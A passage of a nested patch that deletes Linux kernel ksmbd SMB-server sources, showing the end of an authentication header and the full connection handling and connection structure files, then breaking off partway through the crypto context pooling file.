+-		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
+-		      char *cryptkey);
+-int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+-				   int blob_len, struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess);
+-int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
+-				  int blob_len, struct ksmbd_conn *conn);
+-unsigned int
+-ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
+-				   struct ksmbd_conn *conn);
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len,	char *out_blob, int *out_len);
+-int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig);
+-int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig);
+-int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
+-			       struct ksmbd_conn *conn);
+-int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
+-				struct ksmbd_conn *conn);
+-int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
+-				  struct ksmbd_session *sess);
+-int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess);
+-int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
+-				     __u8 *pi_hash);
+-int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
+-		      __u8 *pi_hash);
+-#endif
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+deleted file mode 100644
+index e1d2be19cddfa..0000000000000
+--- a/fs/ksmbd/connection.c
++++ /dev/null
+@@ -1,485 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <namjae.jeon@protocolfreedom.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/mutex.h>
+-#include <linux/freezer.h>
+-#include <linux/module.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-#include "transport_rdma.h"
+-
+-static DEFINE_MUTEX(init_lock);
+-
+-static struct ksmbd_conn_ops default_conn_ops;
+-
+-LIST_HEAD(conn_list);
+-DECLARE_RWSEM(conn_list_lock);
+-
+-/**
+- * ksmbd_conn_free() - free resources of the connection instance
+- *
+- * @conn:	connection instance to be cleand up
+- *
+- * During the thread termination, the corresponding conn instance
+- * resources(sock/memory) are released and finally the conn object is freed.
+- */
+-void ksmbd_conn_free(struct ksmbd_conn *conn)
+-{
+-	down_write(&conn_list_lock);
+-	list_del(&conn->conns_list);
+-	up_write(&conn_list_lock);
+-
+-	xa_destroy(&conn->sessions);
+-	kvfree(conn->request_buf);
+-	kfree(conn->preauth_info);
+-	kfree(conn);
+-}
+-
+-/**
+- * ksmbd_conn_alloc() - initialize a new connection instance
+- *
+- * Return:	ksmbd_conn struct on success, otherwise NULL
+- */
+-struct ksmbd_conn *ksmbd_conn_alloc(void)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	conn = kzalloc(sizeof(struct ksmbd_conn), GFP_KERNEL);
+-	if (!conn)
+-		return NULL;
+-
+-	conn->need_neg = true;
+-	ksmbd_conn_set_new(conn);
+-	conn->local_nls = load_nls("utf8");
+-	if (!conn->local_nls)
+-		conn->local_nls = load_nls_default();
+-	if (IS_ENABLED(CONFIG_UNICODE))
+-		conn->um = utf8_load(UNICODE_AGE(12, 1, 0));
+-	else
+-		conn->um = ERR_PTR(-EOPNOTSUPP);
+-	if (IS_ERR(conn->um))
+-		conn->um = NULL;
+-	atomic_set(&conn->req_running, 0);
+-	atomic_set(&conn->r_count, 0);
+-	conn->total_credits = 1;
+-	conn->outstanding_credits = 0;
+-
+-	init_waitqueue_head(&conn->req_running_q);
+-	init_waitqueue_head(&conn->r_count_q);
+-	INIT_LIST_HEAD(&conn->conns_list);
+-	INIT_LIST_HEAD(&conn->requests);
+-	INIT_LIST_HEAD(&conn->async_requests);
+-	spin_lock_init(&conn->request_lock);
+-	spin_lock_init(&conn->credits_lock);
+-	ida_init(&conn->async_ida);
+-	xa_init(&conn->sessions);
+-
+-	spin_lock_init(&conn->llist_lock);
+-	INIT_LIST_HEAD(&conn->lock_list);
+-
+-	down_write(&conn_list_lock);
+-	list_add(&conn->conns_list, &conn_list);
+-	up_write(&conn_list_lock);
+-	return conn;
+-}
+-
+-bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+-{
+-	struct ksmbd_conn *t;
+-	bool ret = false;
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(t, &conn_list, conns_list) {
+-		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+-			continue;
+-
+-		ret = true;
+-		break;
+-	}
+-	up_read(&conn_list_lock);
+-	return ret;
+-}
+-
+-void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct list_head *requests_queue = NULL;
+-
+-	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
+-		requests_queue = &conn->requests;
+-		work->syncronous = true;
+-	}
+-
+-	if (requests_queue) {
+-		atomic_inc(&conn->req_running);
+-		spin_lock(&conn->request_lock);
+-		list_add_tail(&work->request_entry, requests_queue);
+-		spin_unlock(&conn->request_lock);
+-	}
+-}
+-
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret = 1;
+-
+-	if (list_empty(&work->request_entry) &&
+-	    list_empty(&work->async_request_entry))
+-		return 0;
+-
+-	if (!work->multiRsp)
+-		atomic_dec(&conn->req_running);
+-	spin_lock(&conn->request_lock);
+-	if (!work->multiRsp) {
+-		list_del_init(&work->request_entry);
+-		if (work->syncronous == false)
+-			list_del_init(&work->async_request_entry);
+-		ret = 0;
+-	}
+-	spin_unlock(&conn->request_lock);
+-
+-	wake_up_all(&conn->req_running_q);
+-	return ret;
+-}
+-
+-void ksmbd_conn_lock(struct ksmbd_conn *conn)
+-{
+-	mutex_lock(&conn->srv_mutex);
+-}
+-
+-void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+-{
+-	mutex_unlock(&conn->srv_mutex);
+-}
+-
+-void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(conn, &conn_list, conns_list) {
+-		if (conn->binding || xa_load(&conn->sessions, sess_id))
+-			WRITE_ONCE(conn->status, status);
+-	}
+-	up_read(&conn_list_lock);
+-}
+-
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
+-{
+-	struct ksmbd_conn *bind_conn;
+-
+-	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(bind_conn, &conn_list, conns_list) {
+-		if (bind_conn == conn)
+-			continue;
+-
+-		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
+-		    !ksmbd_conn_releasing(bind_conn) &&
+-		    atomic_read(&bind_conn->req_running)) {
+-			wait_event(bind_conn->req_running_q,
+-				atomic_read(&bind_conn->req_running) == 0);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+-}
+-
+-int ksmbd_conn_write(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	size_t len = 0;
+-	int sent;
+-	struct kvec iov[3];
+-	int iov_idx = 0;
+-
+-	if (!work->response_buf) {
+-		pr_err("NULL response header\n");
+-		return -EINVAL;
+-	}
+-
+-	if (work->tr_buf) {
+-		iov[iov_idx] = (struct kvec) { work->tr_buf,
+-				sizeof(struct smb2_transform_hdr) + 4 };
+-		len += iov[iov_idx++].iov_len;
+-	}
+-
+-	if (work->aux_payload_sz) {
+-		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
+-		len += iov[iov_idx++].iov_len;
+-		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
+-		len += iov[iov_idx++].iov_len;
+-	} else {
+-		if (work->tr_buf)
+-			iov[iov_idx].iov_len = work->resp_hdr_sz;
+-		else
+-			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
+-		iov[iov_idx].iov_base = work->response_buf;
+-		len += iov[iov_idx++].iov_len;
+-	}
+-
+-	ksmbd_conn_lock(conn);
+-	sent = conn->transport->ops->writev(conn->transport, &iov[0],
+-					iov_idx, len,
+-					work->need_invalidate_rkey,
+-					work->remote_key);
+-	ksmbd_conn_unlock(conn);
+-
+-	if (sent < 0) {
+-		pr_err("Failed to send message: %d\n", sent);
+-		return sent;
+-	}
+-
+-	return 0;
+-}
+-
+-int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
+-			 void *buf, unsigned int buflen,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len)
+-{
+-	int ret = -EINVAL;
+-
+-	if (conn->transport->ops->rdma_read)
+-		ret = conn->transport->ops->rdma_read(conn->transport,
+-						      buf, buflen,
+-						      desc, desc_len);
+-	return ret;
+-}
+-
+-int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+-			  void *buf, unsigned int buflen,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len)
+-{
+-	int ret = -EINVAL;
+-
+-	if (conn->transport->ops->rdma_write)
+-		ret = conn->transport->ops->rdma_write(conn->transport,
+-						       buf, buflen,
+-						       desc, desc_len);
+-	return ret;
+-}
+-
+-bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+-{
+-	if (!ksmbd_server_running())
+-		return false;
+-
+-	if (ksmbd_conn_exiting(conn))
+-		return false;
+-
+-	if (kthread_should_stop())
+-		return false;
+-
+-	if (atomic_read(&conn->stats.open_files_count) > 0)
+-		return true;
+-
+-	/*
+-	 * Stop current session if the time that get last request from client
+-	 * is bigger than deadtime user configured and opening file count is
+-	 * zero.
+-	 */
+-	if (server_conf.deadtime > 0 &&
+-	    time_after(jiffies, conn->last_active + server_conf.deadtime)) {
+-		ksmbd_debug(CONN, "No response from client in %lu minutes\n",
+-			    server_conf.deadtime / SMB_ECHO_INTERVAL);
+-		return false;
+-	}
+-	return true;
+-}
+-
+-#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
+-#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
+-
+-/**
+- * ksmbd_conn_handler_loop() - session thread to listen on new smb requests
+- * @p:		connection instance
+- *
+- * One thread each per connection
+- *
+- * Return:	0 on success
+- */
+-int ksmbd_conn_handler_loop(void *p)
+-{
+-	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
+-	struct ksmbd_transport *t = conn->transport;
+-	unsigned int pdu_size, max_allowed_pdu_size;
+-	char hdr_buf[4] = {0,};
+-	int size;
+-
+-	mutex_init(&conn->srv_mutex);
+-	__module_get(THIS_MODULE);
+-
+-	if (t->ops->prepare && t->ops->prepare(t))
+-		goto out;
+-
+-	conn->last_active = jiffies;
+-	while (ksmbd_conn_alive(conn)) {
+-		if (try_to_freeze())
+-			continue;
+-
+-		kvfree(conn->request_buf);
+-		conn->request_buf = NULL;
+-
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+-		if (size != sizeof(hdr_buf))
+-			break;
+-
+-		pdu_size = get_rfc1002_len(hdr_buf);
+-		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+-
+-		if (ksmbd_conn_good(conn))
+-			max_allowed_pdu_size =
+-				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+-		else
+-			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
+-
+-		if (pdu_size > max_allowed_pdu_size) {
+-			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
+-					pdu_size, max_allowed_pdu_size,
+-					READ_ONCE(conn->status));
+-			break;
+-		}
+-
+-		/*
+-		 * Check maximum pdu size(0x00FFFFFF).
+-		 */
+-		if (pdu_size > MAX_STREAM_PROT_LEN)
+-			break;
+-
+-		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
+-			break;
+-
+-		/* 4 for rfc1002 length field */
+-		/* 1 for implied bcc[0] */
+-		size = pdu_size + 4 + 1;
+-		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+-		if (!conn->request_buf)
+-			break;
+-
+-		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+-
+-		/*
+-		 * We already read 4 bytes to find out PDU size, now
+-		 * read in PDU
+-		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+-		if (size < 0) {
+-			pr_err("sock_read failed: %d\n", size);
+-			break;
+-		}
+-
+-		if (size != pdu_size) {
+-			pr_err("PDU error. Read: %d, Expected: %d\n",
+-			       size, pdu_size);
+-			continue;
+-		}
+-
+-		if (!ksmbd_smb_request(conn))
+-			break;
+-
+-		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
+-		    SMB2_PROTO_NUMBER) {
+-			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
+-				break;
+-		}
+-
+-		if (!default_conn_ops.process_fn) {
+-			pr_err("No connection request callback\n");
+-			break;
+-		}
+-
+-		if (default_conn_ops.process_fn(conn)) {
+-			pr_err("Cannot handle request\n");
+-			break;
+-		}
+-	}
+-
+-out:
+-	ksmbd_conn_set_releasing(conn);
+-	/* Wait till all reference dropped to the Server object*/
+-	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+-
+-	if (IS_ENABLED(CONFIG_UNICODE))
+-		utf8_unload(conn->um);
+-	unload_nls(conn->local_nls);
+-	if (default_conn_ops.terminate_fn)
+-		default_conn_ops.terminate_fn(conn);
+-	t->ops->disconnect(t);
+-	module_put(THIS_MODULE);
+-	return 0;
+-}
+-
+-void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops)
+-{
+-	default_conn_ops.process_fn = ops->process_fn;
+-	default_conn_ops.terminate_fn = ops->terminate_fn;
+-}
+-
+-int ksmbd_conn_transport_init(void)
+-{
+-	int ret;
+-
+-	mutex_lock(&init_lock);
+-	ret = ksmbd_tcp_init();
+-	if (ret) {
+-		pr_err("Failed to init TCP subsystem: %d\n", ret);
+-		goto out;
+-	}
+-
+-	ret = ksmbd_rdma_init();
+-	if (ret) {
+-		pr_err("Failed to init RDMA subsystem: %d\n", ret);
+-		goto out;
+-	}
+-out:
+-	mutex_unlock(&init_lock);
+-	return ret;
+-}
+-
+-static void stop_sessions(void)
+-{
+-	struct ksmbd_conn *conn;
+-	struct ksmbd_transport *t;
+-
+-again:
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(conn, &conn_list, conns_list) {
+-		struct task_struct *task;
+-
+-		t = conn->transport;
+-		task = t->handler;
+-		if (task)
+-			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+-				    task->comm, task_pid_nr(task));
+-		ksmbd_conn_set_exiting(conn);
+-		if (t->ops->shutdown) {
+-			up_read(&conn_list_lock);
+-			t->ops->shutdown(t);
+-			down_read(&conn_list_lock);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+-
+-	if (!list_empty(&conn_list)) {
+-		schedule_timeout_interruptible(HZ / 10); /* 100ms */
+-		goto again;
+-	}
+-}
+-
+-void ksmbd_conn_transport_destroy(void)
+-{
+-	mutex_lock(&init_lock);
+-	ksmbd_tcp_destroy();
+-	ksmbd_rdma_destroy();
+-	stop_sessions();
+-	mutex_unlock(&init_lock);
+-}
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+deleted file mode 100644
+index ad8dfaa48ffb3..0000000000000
+--- a/fs/ksmbd/connection.h
++++ /dev/null
+@@ -1,231 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_CONNECTION_H__
+-#define __KSMBD_CONNECTION_H__
+-
+-#include <linux/list.h>
+-#include <linux/ip.h>
+-#include <net/sock.h>
+-#include <net/tcp.h>
+-#include <net/inet_connection_sock.h>
+-#include <net/request_sock.h>
+-#include <linux/kthread.h>
+-#include <linux/nls.h>
+-#include <linux/unicode.h>
+-
+-#include "smb_common.h"
+-#include "ksmbd_work.h"
+-
+-#define KSMBD_SOCKET_BACKLOG		16
+-
+-enum {
+-	KSMBD_SESS_NEW = 0,
+-	KSMBD_SESS_GOOD,
+-	KSMBD_SESS_EXITING,
+-	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE,
+-	KSMBD_SESS_RELEASING
+-};
+-
+-struct ksmbd_stats {
+-	atomic_t			open_files_count;
+-	atomic64_t			request_served;
+-};
+-
+-struct ksmbd_transport;
+-
+-struct ksmbd_conn {
+-	struct smb_version_values	*vals;
+-	struct smb_version_ops		*ops;
+-	struct smb_version_cmds		*cmds;
+-	unsigned int			max_cmds;
+-	struct mutex			srv_mutex;
+-	int				status;
+-	unsigned int			cli_cap;
+-	char				*request_buf;
+-	struct ksmbd_transport		*transport;
+-	struct nls_table		*local_nls;
+-	struct unicode_map		*um;
+-	struct list_head		conns_list;
+-	/* smb session 1 per user */
+-	struct xarray			sessions;
+-	unsigned long			last_active;
+-	/* How many request are running currently */
+-	atomic_t			req_running;
+-	/* References which are made for this Server object*/
+-	atomic_t			r_count;
+-	unsigned int			total_credits;
+-	unsigned int			outstanding_credits;
+-	spinlock_t			credits_lock;
+-	wait_queue_head_t		req_running_q;
+-	wait_queue_head_t		r_count_q;
+-	/* Lock to protect requests list*/
+-	spinlock_t			request_lock;
+-	struct list_head		requests;
+-	struct list_head		async_requests;
+-	int				connection_type;
+-	struct ksmbd_stats		stats;
+-	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-	struct ntlmssp_auth		ntlmssp;
+-
+-	spinlock_t			llist_lock;
+-	struct list_head		lock_list;
+-
+-	struct preauth_integrity_info	*preauth_info;
+-
+-	bool				need_neg;
+-	unsigned int			auth_mechs;
+-	unsigned int			preferred_auth_mech;
+-	bool				sign;
+-	bool				use_spnego:1;
+-	__u16				cli_sec_mode;
+-	__u16				srv_sec_mode;
+-	/* dialect index that server chose */
+-	__u16				dialect;
+-
+-	char				*mechToken;
+-
+-	struct ksmbd_conn_ops	*conn_ops;
+-
+-	/* Preauth Session Table */
+-	struct list_head		preauth_sess_table;
+-
+-	struct sockaddr_storage		peer_addr;
+-
+-	/* Identifier for async message */
+-	struct ida			async_ida;
+-
+-	__le16				cipher_type;
+-	__le16				compress_algorithm;
+-	bool				posix_ext_supported;
+-	bool				signing_negotiated;
+-	__le16				signing_algorithm;
+-	bool				binding;
+-};
+-
+-struct ksmbd_conn_ops {
+-	int	(*process_fn)(struct ksmbd_conn *conn);
+-	int	(*terminate_fn)(struct ksmbd_conn *conn);
+-};
+-
+-struct ksmbd_transport_ops {
+-	int (*prepare)(struct ksmbd_transport *t);
+-	void (*disconnect)(struct ksmbd_transport *t);
+-	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf,
+-		    unsigned int size, int max_retries);
+-	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+-		      int size, bool need_invalidate_rkey,
+-		      unsigned int remote_key);
+-	int (*rdma_read)(struct ksmbd_transport *t,
+-			 void *buf, unsigned int len,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len);
+-	int (*rdma_write)(struct ksmbd_transport *t,
+-			  void *buf, unsigned int len,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len);
+-};
+-
+-struct ksmbd_transport {
+-	struct ksmbd_conn		*conn;
+-	struct ksmbd_transport_ops	*ops;
+-	struct task_struct		*handler;
+-};
+-
+-#define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
+-#define KSMBD_TCP_SEND_TIMEOUT	(5 * HZ)
+-#define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+-
+-extern struct list_head conn_list;
+-extern struct rw_semaphore conn_list_lock;
+-
+-bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+-struct ksmbd_conn *ksmbd_conn_alloc(void);
+-void ksmbd_conn_free(struct ksmbd_conn *conn);
+-bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+-int ksmbd_conn_write(struct ksmbd_work *work);
+-int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
+-			 void *buf, unsigned int buflen,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len);
+-int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+-			  void *buf, unsigned int buflen,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len);
+-void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
+-void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+-int ksmbd_conn_handler_loop(void *p);
+-int ksmbd_conn_transport_init(void);
+-void ksmbd_conn_transport_destroy(void);
+-void ksmbd_conn_lock(struct ksmbd_conn *conn);
+-void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+-
+-/*
+- * WARNING
+- *
+- * This is a hack. We will move status to a proper place once we land
+- * a multi-sessions support.
+- */
+-static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+-}
+-
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+-}
+-
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+-}
+-
+-static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+-}
+-
+-static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+-}
+-
+-static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+-}
+-
+-static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+-}
+-
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+-}
+-
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
+-}
+-
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
+-}
+-
+-static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
+-}
+-
+-void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+-#endif /* __CONNECTION_H__ */
+diff --git a/fs/ksmbd/crypto_ctx.c b/fs/ksmbd/crypto_ctx.c
+deleted file mode 100644
+index 81488d04199da..0000000000000
+--- a/fs/ksmbd/crypto_ctx.c
++++ /dev/null
+@@ -1,266 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/err.h>
+-#include <linux/slab.h>
+-#include <linux/wait.h>
+-#include <linux/sched.h>
+-
+-#include "glob.h"
+-#include "crypto_ctx.h"
+-
+-struct crypto_ctx_list {
+-	spinlock_t		ctx_lock;
+-	int			avail_ctx;
+-	struct list_head	idle_ctx;
+-	wait_queue_head_t	ctx_wait;
+-};
+-
+-static struct crypto_ctx_list ctx_list;
+-
+-static inline void free_aead(struct crypto_aead *aead)
+-{
+-	if (aead)
+-		crypto_free_aead(aead);
+-}
+-
+-static void free_shash(struct shash_desc *shash)
+-{
+-	if (shash) {
+-		crypto_free_shash(shash->tfm);
+-		kfree(shash);
+-	}
+-}
+-
+-static struct crypto_aead *alloc_aead(int id)
+-{
+-	struct crypto_aead *tfm = NULL;
+-
+-	switch (id) {
+-	case CRYPTO_AEAD_AES_GCM:
+-		tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		break;
+-	case CRYPTO_AEAD_AES_CCM:
+-		tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		break;
+-	default:
+-		pr_err("Does not support encrypt ahead(id : %d)\n", id);
+-		return NULL;
+-	}
+-
+-	if (IS_ERR(tfm)) {
+-		pr_err("Failed to alloc encrypt aead : %ld\n", PTR_ERR(tfm));
+-		return NULL;
+-	}
+-
+-	return tfm;
+-}
+-
+-static struct shash_desc *alloc_shash_desc(int id)
+-{
+-	struct crypto_shash *tfm = NULL;
+-	struct shash_desc *shash;
+-
+-	switch (id) {
+-	case CRYPTO_SHASH_HMACMD5:
+-		tfm = crypto_alloc_shash("hmac(md5)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_HMACSHA256:
+-		tfm = crypto_alloc_shash("hmac(sha256)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_CMACAES:
+-		tfm = crypto_alloc_shash("cmac(aes)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_SHA256:
+-		tfm = crypto_alloc_shash("sha256", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_SHA512:
+-		tfm = crypto_alloc_shash("sha512", 0, 0);
+-		break;
+-	default:
+-		return NULL;
+-	}
+-
+-	if (IS_ERR(tfm))
+-		return NULL;
+-
+-	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(tfm),
+-			GFP_KERNEL);
+-	if (!shash)
+-		crypto_free_shash(tfm);
+-	else
+-		shash->tfm = tfm;
+-	return shash;
+-}
+-
+-static void ctx_free(struct ksmbd_crypto_ctx *ctx)
+-{
+-	int i;
+-
+-	for (i = 0; i < CRYPTO_SHASH_MAX; i++)
+-		free_shash(ctx->desc[i]);
+-	for (i = 0; i < CRYPTO_AEAD_MAX; i++)
+-		free_aead(ctx->ccmaes[i]);
+-	kfree(ctx);
+-}
+-
+-static struct ksmbd_crypto_ctx *ksmbd_find_crypto_ctx(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	while (1) {
+-		spin_lock(&ctx_list.ctx_lock);
+-		if (!list_empty(&ctx_list.idle_ctx)) {
+-			ctx = list_entry(ctx_list.idle_ctx.next,
+-					 struct ksmbd_crypto_ctx,
+-					 list);
+-			list_del(&ctx->list);
+-			spin_unlock(&ctx_list.ctx_lock);
+-			return ctx;
+-		}
+-
+-		if (ctx_list.avail_ctx > num_online_cpus()) {
+-			spin_unlock(&ctx_list.ctx_lock);
+-			wait_event(ctx_list.ctx_wait,
+-				   !list_empty(&ctx_list.idle_ctx));
+-			continue;
+-		}
+-
+-		ctx_list.avail_ctx++;
+-		spin_unlock(&ctx_list.ctx_lock);
+-
+-		ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
+-		if (!ctx) {
+-			spin_lock(&ctx_list.ctx_lock);
+-			ctx_list.avail_ctx--;
+-			spin_unlock(&ctx_list.ctx_lock);
+-			wait_event(ctx_list.ctx_wait,
+-				   !list_empty(&ctx_list.idle_ctx));
+-			continue;
+-		}
+-		break;
+-	}
+-	return ctx;
+-}
+-
+-void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx)
+-{
+-	if (!ctx)
+-		return;
+-
+-	spin_lock(&ctx_list.ctx_lock);
+-	if (ctx_list.avail_ctx <= num_online_cpus()) {
+-		list_add(&ctx->list, &ctx_list.idle_ctx);
+-		spin_unlock(&ctx_list.ctx_lock);
+-		wake_up(&ctx_list.ctx_wait);
+-		return;
+-	}
+-
+-	ctx_list.avail_ctx--;
+-	spin_unlock(&ctx_list.ctx_lock);
+-	ctx_free(ctx);
+-}
+-
+-static struct ksmbd_crypto_ctx *____crypto_shash_ctx_find(int id)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	if (id >= CRYPTO_SHASH_MAX)
+-		return NULL;
+-
+-	ctx = ksmbd_find_crypto_ctx();
+-	if (ctx->desc[id])
+-		return ctx;
+-
+-	ctx->desc[id] = alloc_shash_desc(id);
+-	if (ctx->desc[id])
+-		return ctx;
+-	ksmbd_release_crypto_ctx(ctx);
+-	return NULL;
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACMD5);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACSHA256);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_CMACAES);
+-}
+-
